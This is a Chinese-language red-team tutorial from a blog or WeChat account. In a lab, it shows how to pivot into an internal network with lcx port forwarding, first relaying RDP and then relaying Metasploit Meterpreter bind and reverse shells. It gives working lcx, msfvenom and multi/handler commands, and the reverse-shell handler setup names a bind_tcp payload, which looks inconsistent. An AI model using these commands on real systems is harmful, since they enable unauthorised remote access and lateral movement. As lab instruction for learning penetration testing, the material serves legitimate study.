lcx端口转发

目录

0x01 正向端口转发

0x02 反向端口转发

0x03 msf正向shell

0x04 msf反向shell

注:

边界机器 win08 192.168.222.175

内网机器 win7 192.168.222.137

msf机器 Ubuntu 192.168.222.177

0x01 正向端口转发

在边界机器上执行端口转发命令,让来自指定端口的流量全部转发到内网指定IP指定端口上。

这里关闭了防火墙,在正常情况下请使用netsh来对端口进行开放,详细步骤可以参考以前的文章【使用netsh来进行端口转发

这里我们将本地53端口的全部流量都转发到内网机器的3389端口,从而进行远程连接

lcx.exe -tran 53 192.168.222.137 3389

lcx端口转发_第1张图片

当然在执行完之后,我们再确定一下端口是否已经启用

lcx端口转发_第2张图片

然后我们在本地来进行远程连接

lcx端口转发_第3张图片

lcx端口转发_第4张图片

0x02 反向端口转发

如果我们只有当前目标的webshell,并没有边界主机可以利用的话,就可以通过反向端口转发来使内网流量都转发到自己的主机上。

注:这里我们用边界机器win08来代替我们的本地主机

首先在本地机器执行监听

lcx.exe -listen 53 1234

使用netstat -ano 确保端口已经启用

file

然后在目标机器(win7)上执行

lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389

即将本地3389端口的流量都转发到win8机器的53端口上,如果有边界服务器可以利用的话,则在边界服务器执行该命令,将对应的IP和端口改变就可以了。

lcx端口转发_第5张图片

然后在本地(win8)远程连接即可

0x03 msf正向shell

使用lcx执行正向端口转发,去连接内网的meterpreter

首先先用msf生成一个马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

lcx端口转发_第6张图片

然后去边界机器执行lcx的正向端口转发,将来自53端口的流量全部转发到内网的meterpreter上

lcx.exe -tran 53 192.168.222.137 53

然后去内网机器运行我们的马

再回到Ubuntu上,对其进行监听,监听边界机器的53端口即可

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run

lcx端口转发_第7张图片

0x04 msf反向shell

反向shell也是一样的道理

首先先生成我们的马,这里回连的IP和端口都是边界机器的

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175  -f exe >> 123.exe

lcx端口转发_第8张图片

然后到边界机器上执行监听

lcx.exe -listen 53 8888

到内网机器执行我们的马

lcx端口转发_第9张图片

回到Ubuntu上,对其进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j

lcx端口转发_第10张图片

lcx端口转发_第11张图片

可见第一次并没有成功弹回session,这个使由于lcx的原因,多尝试两次就可以了

文章首发公众号:无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记,个人成长的公众号

扫码关注即可

file

你可能感兴趣的:(微信公众平台)